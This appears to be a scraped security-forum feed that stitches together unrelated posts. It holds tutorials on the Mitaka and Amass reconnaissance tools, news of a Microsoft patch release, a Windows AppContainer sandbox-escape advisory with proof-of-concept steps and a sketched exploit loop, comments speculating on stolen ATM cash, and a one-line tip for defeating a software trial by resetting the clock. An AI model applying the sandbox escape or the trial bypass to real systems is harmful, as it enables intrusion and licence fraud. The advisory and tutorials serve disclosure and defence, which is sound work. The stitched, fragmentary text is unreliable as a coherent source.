the file is really OK? 
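To compare your download against the hash published on the site, you first need to compute the local file's digest. A quick way to do that in Python, assuming the site publishes SHA-256 hashes:

```python
import hashlib

def sha256_of(path: str) -> str:
    """Hash the file in chunks so large downloads don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def matches_published(path: str, published: str) -> bool:
    """Compare the local hash to the one listed on the download page."""
    return sha256_of(path) == published.strip().lower()
```

If the comparison fails, the file was tampered with or corrupted in transit; if it succeeds, the hash itself is what you'd highlight and send through Mitaka to a service like VirusTotal.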
If a virus scanner doesn't catch it on the computer, you can always take the hash of the file that's on the website, right-click it, choose "Mitaka," then use something like VirusTotal. This scanner can identify potentially suspicious files by looking at the hash and trying to find out whether or not it could harm your computer. In our case, we can see that there are multiple detections and that this is a macOS crypto miner. So if we had run this on our computer, even though it's undetected by Avast and a bunch of other different, pretty reputable malware scanners, it still would have gotten through. So, as you can see, Mitaka is a pretty effective way of checking to see if a file you encounter on the web has been flagged for doing something bad using tools like VirusTotal or another data source. Available from the menu for this kind of search are Censys, PublicWWW, ANY.RUN, Apklab, Hashdd, HybridAnalysis, InQuest, Intezer, JoeSandbox, MalShare, Maltiverse, MalwareBazaar, Malwares, OpenTIP, OTX, Pulsedive, Scumware, ThreatMiner, VirusTotal, VMRay, VxCube, and X-Force-Exchange. Example 3 Checking to See if a Site Is Sketchy Now, we can also do URL searches with Mitaka. If we're looking at a big data dump, or if we just want to see if a particular URL on a webpage or email has been identified with something sketchy, we can right-click the link, choose "Mitaka," then select from one of the tools. Available tools for this kind of search include Censys, PublicWWW, BinaryEdge, crt.sh, DNSlytics, DomainBigData, DomainTools, DomainWatch, FOFA, GoogleSafeBrowsing, GreyNoise, Hashdd, HurricaneElectric, HybridAnalysis, IntelligenceX, Maltiverse, OTX, Pulsedive, RiskIQ, Robtex, Scumware, SecurityTrails, Shodan, SpyOnWeb, Spyse, Talos, ThreatConnect, ThreatCrowd, ThreatMiner, TIP, URLhaus, Urlscan, ViewDNS, VirusTotal, VxCube, WebAnalyzer, and X-Force-Exchange. For our test, let's just check on Censys.
In our case, the domain we searched is associated with some pretty sketchy stuff. Because we can see that it's being used for poor lookups and all sorts of other worrisome activities, we can assume that it's probably not a domain that's owned by a corporation or company that is more straightforward with its dealings. This is just someone looking to make as much money as they can off of the web space that they have. We can also see that it uses an Amazon system, which means that it's probably just a rented system and not actually someone's physical setup. All of this data points to the fact that this would be a very sketchy website to do business with and may not be as legitimate as you'd like. There's a Lot More to Explore! Those were all pretty basic use cases, but as you can see, there are a ton of different ways we can investigate a clue on the internet using a simple right-click menu. One thing that is really cool about Mitaka is that it's able to detect different types of data so that the contextual search options can cater to the right information. This was just a quick overview. If you want to get started with Mitaka, you should go through all the different data types, highlight something on a website or email, then right-click and choose your Mitaka search. There are a lot of available sources, and it can be overwhelming at first, but that just means Mitaka is a valuable tool with tons of helpful searches available at your fingertips. Source
-
-
Throughout history, human beings have crafted tools as a way to improve people’s lives. From stone hammers to metal knives, through advancements from rudimentary medical instruments to breakthroughs made with industrial steam machinery. From the disruption of transistors and the computer era through today’s technology that seems to come straight out of science fiction, like the storage of data in DNA, tools at the very least allow us to get more work done. Tools afford us time and efficiency, and the security industry is no exception. Security tools are what optical illusions are for magicians: they yield impressive results in brief periods of time, with a great impact on your audience. These digital instruments open multiple doors to a world of information that would otherwise be difficult to perceive. Today we’re introducing you to Amass, a true information-gathering ‘Swiss Army knife’ for your command line toolbox. It was originally written by Jeff Foley (currently the Amass Project Leader) and later adopted by the OWASP Foundation. What is Amass? Amass is an open source network mapping and attack surface discovery tool that uses information gathering and other techniques, such as active reconnaissance and external asset discovery, to scrape all the available data. In order to accomplish this, it uses its own internal machinery and also integrates smoothly with different external services to increase its results, efficiency and power. This tool maintains a strong focus on DNS, HTTP and SSL/TLS data discovery and scraping. To do this, it has its own techniques and provides several integrations with different API services like (spoiler alert!) the SecurityTrails API. It also uses different web archiving engines to scrape the bottom of the internet’s forgotten data deposits. Installation Let’s start by installing this tool in our local environment.
While it supports multiple software platforms, more interestingly, it supports different hardware architectures, which means that you could build your own automated box using a small but powerful ARM board—a Raspberry Pi for instance, or even a mobile phone! Today our focus is to work on a 64-bit PC with Linux, but if you want to test it first and install it later, we strongly suggest you try out the Docker image. To install it from a pre-compiled binary, go to the releases section of their GitHub page. You can access it here, and a screenshot of available zip packages as well as the source code is shown below: It’s very important (especially when using security tools) that you check the integrity of those downloaded binaries to be sure there has been no tampering whatsoever between what you intended to download and what you actually ended up downloading onto your hard drive. To do that, you need to save the file amass_checksums.txt, which includes the hash checksums needed to verify the authenticity of each OS binary. For the Amass 3.5.2 version (the latest release available at the time of this writing) the checksum file has the following contents: Since in this analysis we’re using Linux on an amd64 CPU architecture, we only verify that hash (you can skip this step if you want, but the check will output several “No such file…” errors). To do so, we must first remove all non-corresponding hashes from the file, and invoke the following command: $ shasum -c amass_checksums.txt amass_v3.5.2_linux_amd64.zip: OK With that result, we can be assured that the binary is correct, and that there were no file modifications while it was downloading. Simply fetch the desired .zip file (in our case that would be amass_v3.5.2_linux_amd64.zip), uncompress it and enter the newly created folder (amass_v3.5.2_linux_amd64).
In it you will see different files and folders; the executable is called “amass”, and when you run it, you’ll see this: This would be the end of the installation, but if you want it to be part of your $PATH, just move the amass binary to your favourite executables folder. First steps Let’s take a look at the subcommands so we can check out the power of this tool: Subcommands: amass intel - Discover targets for enumerations amass enum - Perform enumerations and network mapping amass viz - Visualize enumeration results amass track - Track differences between enumerations amass db - Manipulate the Amass graph database amass dns - Resolve DNS names at high performance We are going to explain briefly what they do and how to activate them, while trying to dig a little deeper than the official tutorial or user guide, for both fun and educational purposes! Presentation by obfuscation One particularly interesting option of the intel subcommand is the “-demo” flag, which allows us to output results in an obfuscated manner. This way, we can make presentations without revealing too much information about our targets. In this example we are conducting an intelligence gathering action and obtaining an obfuscated output with the use of the -demo flag in the command line. This will replace TLDs and ccTLDs with ‘x’ characters: $ amass intel -asn 6057 -demo adsl.xxxxxxxxx.xxx.xx ancel.xxx.xx ir-static.xxxxxxxxx.xxx.xx algorta.xxx.xx estudiocontable.xxx.xx fielex.xxx.xx ain.xxx.xx vyt.xxx.xx com.xx cx2sa.xxx easymail.xxx.xx mor-inv.xxx catafrey.xxx kernel.xxx.xx bglasesores.xxx sislersa.xxx arpel.xxx.xx copab.xxx.xx spefar.xxx aitacargas.xx duprana.xx sua.xxx.xx gruporovira.xxx exterior.xxxxx.xxx lideco.xxx seaairforwarders.xxx flp.xx acac.xxx.xx cerrolargo.xxx.xx esquemas.xxx Autonomous system number inquiry Autonomous systems are the true guardians of internet communications.
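A quick aside on the -demo output above: judging by the results, the masking keeps the first label of each hostname and overwrites every character of the remaining labels with 'x'. Here's a hypothetical Python re-implementation of that transformation, purely to illustrate the idea — Amass's actual -demo logic may differ:

```python
def demo_mask(hostname: str, keep_labels: int = 1) -> str:
    """Keep the first label(s) of a hostname and mask the rest with
    runs of 'x' of the same length, like Amass's -demo output."""
    labels = hostname.split(".")
    head = labels[:keep_labels]
    masked = ["x" * len(label) for label in labels[keep_labels:]]
    return ".".join(head + masked)

print(demo_mask("ancel.com.uy"))  # ancel.xxx.xx
```

This preserves the shape of each result (label count and length) while hiding the registrable domain, which is exactly what makes the output safe for presentations.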
They know exactly how your traffic can reach a certain destination by receiving and advertising routing information. If this sounds at all interesting, let us tell you, it is. Let’s dive into a little more detail. Every organization connected to the internet with IP ranges to advertise, or that wants multihomed broadband connections (for example, “I’m a cloud provider, and want to advertise my own delegated IP range to two different ISPs”), should have an autonomous system (AS for short). An autonomous system number (abbreviated as ASN) is the ID number of this AS given by your region’s NIC authority (you can find more information on this topic in our previous article about ASN Lookup). So what could you possibly do with this command? For one thing, you could dig up all the domain names associated with an entire ASN—that means a complete cloud provider (e.g., Google or Microsoft have their own ASN), an entire mega company (Apple, Akamai and Cloudflare also have their own ASNs), or an entire ISP (internet service providers of all sizes have ASNs, even the medium-sized and smaller ones). Internet exchanges and regional internet registries (IXs and RIRs, respectively) also have associated AS Numbers. So how can we perform an ASN check? Once you have your target’s ASN you can find out what’s in there, as in the following example: $ amass intel -asn 28000 labs.lacnic.net lacnic.net.uy lactld.org dev.lacnic.net lacnic.net lacnog.org net.uy lacnog.lat ripe.net Here we have just queried the LACNIC (Latin American and Caribbean RIR) ASN; now we’ll try with the RIPE (Europe, Middle East and Central Asia RIR) ASN: $ amass intel -asn 25152 root-servers.net Despite the few results, those domains (especially the last one, corresponding to RIPE’s ASN) are some of the most important names on the internet (check out our piece on DNS Root Servers). Great! What else can we do with this tool? Let’s find AS Numbers by way of description.
This is incredibly useful, as you can get records quickly and avoid gathering data manually, by looking at companies’ websites, looking glass tools, and more. By following the previous example, we’ll be looking at some of the AS Numbers regarding other existing RIRs (hint: ARIN corresponds to North America, AFRINIC to Africa and APNIC services to Pacific Facing Asia and Oceania): ARIN Results $ amass intel -org ARIN 3856, PCH-AS - Packet Clearing House 3914, KMHP-AS-ARIN - Keystone Mercy Health Plan 4441, MARFORPACDJOSS - Marine Forces Pacific 6656, STARINTERNET 6702, APEXNCC-AS Gagarina avenue 6942, CLARINET - ClariNet Communications Corporation 7081, CARIN-AS-BLOCK - ISI 7082, CARIN-AS-BLOCK - ISI 7083, CARIN-AS-BLOCK - ISI 7084, CARIN-AS-BLOCK - ISI 7085, CARIN-AS-BLOCK - ISI 9489, KARINET-AS Korea Aerospace Research Institute 10034, GARAK-AS-KR SEOUL AGRICULTURAL & MARINE PRODUCTS CORP. 10056, HDMF-AS Hyundai Marin & Fire Insurance 10065, KMTC-AS-KR Korea Marine Transport 10309, MARIN-MIDAS - County of Marin 10439, CARINET - CariNet 10715, Universidade Federal de Santa Catarina 10745, ARIN-ASH-CHA - ARIN Operations 10927, PCH-SD-NAP - Packet Clearing House 11179, ARYAKA-ARIN - Aryaka Networks 11187, GWS-ARIN-AS - Global Web Solutions 11228, ARINC - ARINC 11242, Universidade Federal de Santa Catarina AFRINIC Results $ amass intel -org AFRINIC 33764, AFRINIC-ZA-JNB-AS 37177, AFRINIC-ANYCAST 37181, AFRINIC-Anycast-RFC-5855 37301, AFRINIC-ZA-CPT-AS 37708, AFRINIC-MAIN 131261, AFRINIC-AS-AP Temporary assignment due to software testing APNIC Results $ amass intel -org APNIC 4608, APNIC-SERVICES Asia Pacific Network Information Centre 4777, APNIC-NSPIXP2-AS Asia Pacific Network Information Centre 9450, WEBEXAPNIC-AS-AP Webex Communications Inc 9838, APNIC-DEBOGON-AS-AP APNIC Debogon Project 17821, APNICTRAINING-ISP ASN for APNICTRAINING LAB ISP 18366, APNIC-ANYCAST-AP ANYCAST AS 18367, APNIC-UNI1-AP UNICAST AS of ANYCAST node(Hongkong) 18368, APNIC-SERVICES APNIC DNS 
Anycast 18369, APNIC-ANYCAST2 APNIC ANYCAST 18370, APNIC-UNI4-AP UNICAST AS of ANYCAST node(Other location) 23659, HEITECH-AS-AP APNIC HEITECH ASN 24021, APNICRANDNET-TUI-AU TUI experiment 24555, APRICOT-APNIC-ASN ASN used for conferences in AP region 38271, CSSL-APNIC-2008-IN CyberTech House 38610, APNIC-JP-RD APNIC R&D Centre 38905, CPHAPNIC-AS-AP Consolidated Press Holdings Limited 45163, APNICRANDNET-TUI2-AU TUI experiment 45192, APNICTRAINING-DC ASN for APNICTRAINING LAB DC 55420, SABAHNET-AS-AP APNIC ASN Block This set of outputs shows us which AS Numbers have a description matching our search criteria, which is extremely useful and fast! Other intel capabilities may include: Reverse WHOIS queries Active reconnaissance On this topic, we could say that the flag -active gives a proactive check against additional sources of information, checks what active SSL/TLS Certificates this server has and provides us with additional information (enabling the -src flag allows us to see which source of information was queried as well as the corresponding result). $ amass intel -addr 8.8.8.8 -src [Reverse DNS] dns.google $ amass intel -active -addr 8.8.8.8 -src[Reverse DNS] dns.google [Active Cert] dns.google.com [Active Cert] 8888.google The intel subcommand provides different ways to output information, and to make further checks like port scanning, you can take a look at more details in the github documentation page. Reconnaissance How about plain and simple DNS record enumeration? Amass provides this using the enum subcommand, and it queries multiple different sources of information to check the existence of domain related subdomains. In the image below you can see the different backends this tool relies on to find information. Some of them are quite peculiar, as in the case of the Pastebin website check. Now here’s an example of how adding an ASN to the query can obtain additional information. 
In the first query we explicitly added the AS Number, and for the second query it was removed. The results speak for themselves: $ amass enum -asn 28000 -d lacnic.net $ amass enum -d lacnic.net To summarize, adding a context (e.g., ASN) could help with getting more information from your query. Scraping unpublished subdomains Sometimes subdomains won’t show up. They can be a bit inactive, and when queried, their activity goes far below the radar. So how do we get them? Meet subdomain brute forcing. This technique allows us to bring in our custom wordlist and try it against the configured domain name, in an attempt to find or discover unseen subdomains. In this case, we are going to guess… $ amass enum -brute -src -d ripe.net -demo The output will look similar to this: Tracking Is there anything really static on the internet? Well, there are no simple answers to this question. The volatility that DNS records, BGP routes, and IP space have on the internet is astonishing. In this scenario, we will use the track subcommand, to see exactly what has changed between our previous checks. The results may surprise you: Apparently, in a window of roughly six hours, two subdomains’ AAAA records were removed. The track subcommand allows us to match information between checks and output the difference between them, so you can get an idea of how quickly a target is moving. For more detail, you can add the -history flag, and this will output different time frames and activity. The following example accounts for the -history flag, so you can see how the output will look: Wait, there’s data storage too? The short answer is yes. Amass implements a graph database that can be queried after every check to see which records have been modified, and to speed up query results. The following command will give us a summary on the data we’ve collected, showing the sources of information ordered by ASN and IP range in conjunction with a list of the domains and subdomains discovered. 
$ amass db -show To perform further data analysis, it’s helpful to get a unique identification number that will let you trace the different checks you have made (it helps when trying to filter and visualize data later). To get this ID you’ll need to run the following: Then, if desired, you can get a summary—or the full output—regarding the investigation. For the sake of brevity, let’s just do a summary output of index number 1 corresponding to the ripe.net analysis: Visualization If you’ve come this far, you probably have an overall idea of the power of this tool, and you’re probably plenty excited about the data outputs and the colourful shell results as well! But what if you want to extract these findings and take them to the next level? Perhaps you want to be able to show your target ecosystem, and make a nice presentation of it. If that’s the case, then Amass has you covered. Let’s meet the viz subcommand. That image you see below could be one of the possible outputs. To gain some insight, the small red dot at the center corresponds to the ripe.net domain, and the satellites connected to it are different objects that represent associated data such as IP addresses, DNS records, etc. You can zoom in to see what all this is composed of, namely: Red dots - domain names Green dots - subdomain names Yellow dots - reverse pointer records Orange dots - IP addresses (v4 & v6) Purple dots - mail exchanger records (MX) Cyan dots - nameserver records (NS) Blue dots - autonomous system numbers (ASNs) Pink dots - IP netblocks As you zoom in on this example, your visualization would look like the one below: And if you want to look at (almost) the whole ecosystem, you can zoom out to see the “big picture”. You can make your own visualization, focused on a specific analysis. 
Now we are taking the index identification number (8) obtained in the previous section and opening the output file that we need to visualize: $ amass viz -enum 8 -d3 The animated visualization HTML file will look similar to this: What about API integrations? While it may seem like this tool has no need for configuration files, that’s not entirely true. When an API interaction is needed, you need to conveniently save your keys so you can use this feature recurrently. To do that, we are going to set up an Amass configuration file, with the necessary information for the APIs to work, and throw down some commands to see how the tool behaves. We can start by downloading an example configuration file from this link. The config file should be placed in one of the locations stated in the following table, depending on your deployment: You can also place a different config file for testing purposes, if you set the -config flag. When it comes to enabling an API key, it’s pretty straightforward. Just uncomment the desired API section and place your SecurityTrails-provided API key: [SecurityTrails] apikey = YOUR_API_KEY Then, simply invoke the desired command, using the config file with the API key in it, in our case: We can see that the SecurityTrails API integration is enabled, now let’s see if we can get any results by using it: Great! You’ve just learned how to enable an API key and execute a query using it. If you need more information, just look into the config file for more useful data about integrations and third-party services. Summary While this tool is an amazing resource for finding data about any target, it’s somewhat vague in its documentation and how it actually works. Of course, you’re probably thinking, “Why do I need to know how they do it?”, but understanding how it gathers data according to a determined method makes it easier to determine how accurate the result is.
You could be getting a domain associated with a given ASN that, at first sight, bears no logical relation to it, yet is still listed without a proper explanation. If you search in the most common places, such as WHOIS, DNS A, MX, TXT, or reverse pointer (rDNS or PTR) records, etc., you won’t easily find a good reason for its appearance within the output. Of course, if you’re familiar with Golang, you can read first-hand how it’s been created, and yes, the -src flag can shed light on where data is pulled from, but if you’re not up for a source code review, a little more in the way of in-depth documentation (explaining how every check works) would be really nice. All in all, know this: Amass should definitely be included in your security toolbox. Source
-
I know; I have friends with shops that turn over at least 20,000 RON a day. The provenance of the bills and their serial numbers matter; banks usually sort them by series, so if the series are repetitive and the bills are dirty, it can be traced easily Edit/ that's assuming there's nothing rotten going on; there have been cases where pawn shop owners robbed themselves for the insurance Edit// there are video cameras (CCTV) at every pedestrian crossing; the head of the post office was probably eating donuts. They surely took off their masks when they left, changed clothes, etc.
-
It was 404 when Marcus Hutchins was locked up; he had a profile there, but after a while it was "hidden". I know what helicopters mean
-
Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users. The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120. Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server. Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019. Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future. 
Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates. Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then. Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates have even been known to erase or corrupt files. So do yourself a favor and back up before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide. As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Source
-
-
Try it on a new device; it probably leaves signatures in DLLs somewhere if it doesn't work after a re-install. You install it, set the same date, and when you restart it you set the date back to the one you installed it on (offline)
-
I was NOT drunk; get in if you can, it's a 404 hidden shell
-
Dude, understand: they can't do anything with the money. Let's suppose what Pacalici said is true, that the cassettes are sealed; fine, but then where does the money come out, through a slot? They have openings through which the "ink" is injected in case of a bang. It all ties together, you'll see for yourself
-
The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. advisory-info: Windows: StorageFolder Marshaled Object Access Check Bypass EoP Windows: StorageFolder Marshaled Object Access Check Bypass EoP Platform: Windows 10 2004/1909 Class: Elevation of Privilege Security Boundary: AppContainer Summary: The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. Description: When a StorageFolder object is passed between processes it's custom marshaled using the CStorageFolderProxy class (CLSID: a5183349-82de-4bfc-9c13-7d9dc578729c) in windows.storage.dll. The custom marshaled data contains three values, a standard marshaled OBJREF for a Proxy instance in the originating process, a standard marshaled OBJREF for the original CStorageFolder object and a Property Store. When the proxy is unmarshaled the CStorageFolderProxy object is created in the client process, this redirects any calls to the storage interfaces to the creating process's CStorageFolder instance. The CStorageFolder will check access based on the COM caller. However, something different happens if you call a method on the marshaled Proxy object. The call will be made to the original process's Proxy object, which will then call the real CStorageFolder method. The problem is the Proxy and the real object are running in different Apartments, the Proxy in the MTA and the real object in a STA. This results in the call to the real object being Cross-Apartment marshaled, this breaks the call context for the thread as it's not passed to the other apartment. As shown in a rough diagram. [ Client (Proxy::Call) ] => [Server [ MTA (Proxy::Call) ] => [ STA (Real::Call) ] ] As the call context is only captured by the real object this results in the real object thinking it's being called by the same process, not the AppContainer process. 
If the process hosting the StorageFolder is more privileged this can result in being able to read/write arbitrary files in specific directories. Note that CStorageFile is similarly affected, but I'm only describing CStorageFolder. In any case it's almost certainly the shared code which is a problem. I've no idea why the classes aren't using the FTM, perhaps they're not marked as Agile? If they were then the real object would be called directly and so would still be running in the original caller's context. Even if the FTM was enabled and the call context was maintained it's almost certainly possible to construct the proxy in a more privileged, but different process because of the asymmetric nature of the marshaling, invoke methods in that process which will always have to be performed out of process. Fixing wise, firstly I don't think the Proxy should ever end up standard marshaled to out of process callers, removing that might help. Also when a call is made to the real implementation perhaps you need to set a Proxy Blanket or enable dynamic cloaking and impersonate before the call. There does seem to be code to get the calling process handle as well, so maybe that also needs to be taken into consideration? This code looks like it's copied and pasted from SHCORE which is related to the bugs I've already reported. Perhaps the Proxy is not supposed to be passed back in the marshal code, but the copied code does that automatically? I'd highly recommend you look at any code which uses the same CFTMCrossProcClientImpl::_UnwrapStream code and verify they're all correct. Proof of Concept: I've provided a PoC as a C# project. The code creates an AppContainer process (using a temporary profile). It then uses the Partial Trust StorageFolderStaticsBrokered class, which is instantiated OOP inside a RuntimeBroker instance. The class allows opening a StorageFolder object to the AC profile's Temporary folder. 
StorageFolderStaticsBrokered is granted access to any AC process, as well as the "lpacAppExperience" capability, which means it also works from Classic Edge LPAC. The PoC then uses the IStorageItem2::GetParentAsync method to walk up the directory hierarchy until it reaches %LOCALAPPDATA%. It can't go any higher than that, as there seems to be some restriction in place, probably because it's the base location for package directories. The code then writes an arbitrary file, abc.txt, to the Microsoft sub-directory. Being able to read and write arbitrary files in the user's Local AppData is almost certainly enough to escape the sandbox, but I've not put that much time into it.

1) Compile the C# project. It will need to grab NtApiDotNet from NuGet to work.
2) Run the PoC executable.

Expected Result: Accessing files outside the AppContainer's directory is blocked.

Observed Result: An arbitrary file is written to the %LOCALAPPDATA%\Microsoft directory.

This bug is subject to a 90-day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-09-23. Disclosure at an earlier date is also possible if agreed upon by all parties.

Related CVE Numbers: CVE-2020-0886.

Found by: forshaw@google.com

Download: GS20200908185407.tgz (18 KB)

Source
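The PoC's walk-up loop can be sketched as follows (paths and the stop condition are illustrative; the real PoC calls IStorageItem2::GetParentAsync on brokered StorageFolder objects and stops where the broker refuses to go higher):

```python
# Sketch of the escalation loop: start at the AppContainer's temporary
# folder, repeatedly take the parent until the stop directory is reached,
# then target a file in a sibling sub-directory. Paths are hypothetical.
from pathlib import Path


def walk_up(start: Path, stop_name: str) -> Path:
    """GetParentAsync analogue: step upward until the directory named
    stop_name is reached (or the root, whichever comes first)."""
    folder = start
    while folder.name.lower() != stop_name.lower() and folder.parent != folder:
        folder = folder.parent
    return folder


start = Path("C:/Users/user/AppData/Local/Packages/pkg/AC/Temp")
local = walk_up(start, "Local")          # the %LOCALAPPDATA% boundary
target = local / "Microsoft" / "abc.txt"  # the file the PoC writes
print(target)
```

In the real exploit each upward step is an out-of-process call whose access check is defeated by the marshaling bug described above; the loop itself is just ordinary directory traversal.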
-
- 1
-
Man, we're talking about Otopeni, not Berzunti
-
Nytro, those Ariel pads I was talking about contain a specific acid that dissolves certain elements, regardless of whether it's euros or dollars; it shows up clearly under UV. PS: the pounds are all plastic
-
"it happens to the big players too" https://www.ecb.europa.eu/euro/banknotes/ink-stained/html/index.en.html
-
Complex workflows

Titanoboa is a platform for creating complex workflows on the JVM. Thanks to its generic, distributed, and easily extensible design, you can use it for a wide variety of purposes:

- as a Service Bus (ESB)
- as a full-featured iPaaS / Integration Platform
- for Big Data processing
- for IT Automation
- for Batch Processing
- for Data Transformations / ETL

Your workflow graph can even be cyclic! We don't care.

In Titanoboa workflows you can execute your steps sequentially or in parallel, then join parallel threads back together whenever you wish. Each step can be handled transactionally to make sure it really did run. If things go south, you can let the step retry automatically, or just catch errors and handle them as you wish...

Screenshots:

Download Trial

Source
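The automatic-retry behavior described above is a standard workflow-engine pattern. As a generic illustration (this is not Titanoboa's API, just the underlying idea of re-running a failed step a bounded number of times before surfacing the error):

```python
# Generic retry-on-failure wrapper for a workflow step: the step is retried
# automatically, and only after the retry budget is exhausted is the error
# raised for the caller to catch and handle. Names are illustrative.
def run_step(step, retries=3):
    last_err = None
    for attempt in range(1, retries + 1):
        try:
            return step()
        except Exception as err:
            last_err = err  # step failed; retry automatically
    raise last_err          # out of retries: surface the error


calls = {"n": 0}


def flaky():
    """A step that fails twice before succeeding."""
    calls["n"] += 1
    if calls["n"] < 3:
        raise RuntimeError("transient failure")
    return "done"


print(run_step(flaky))  # succeeds on the third attempt
```

Engines like the one described typically combine this with transactional step handling, so a retried step either completes fully or leaves no partial effects behind.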
-
try this method
-
Anyway, they can't do anything with the money (if the notes are new series): at the first shock the Ariel pads burst, they'll fight among themselves, and the idiots will give themselves away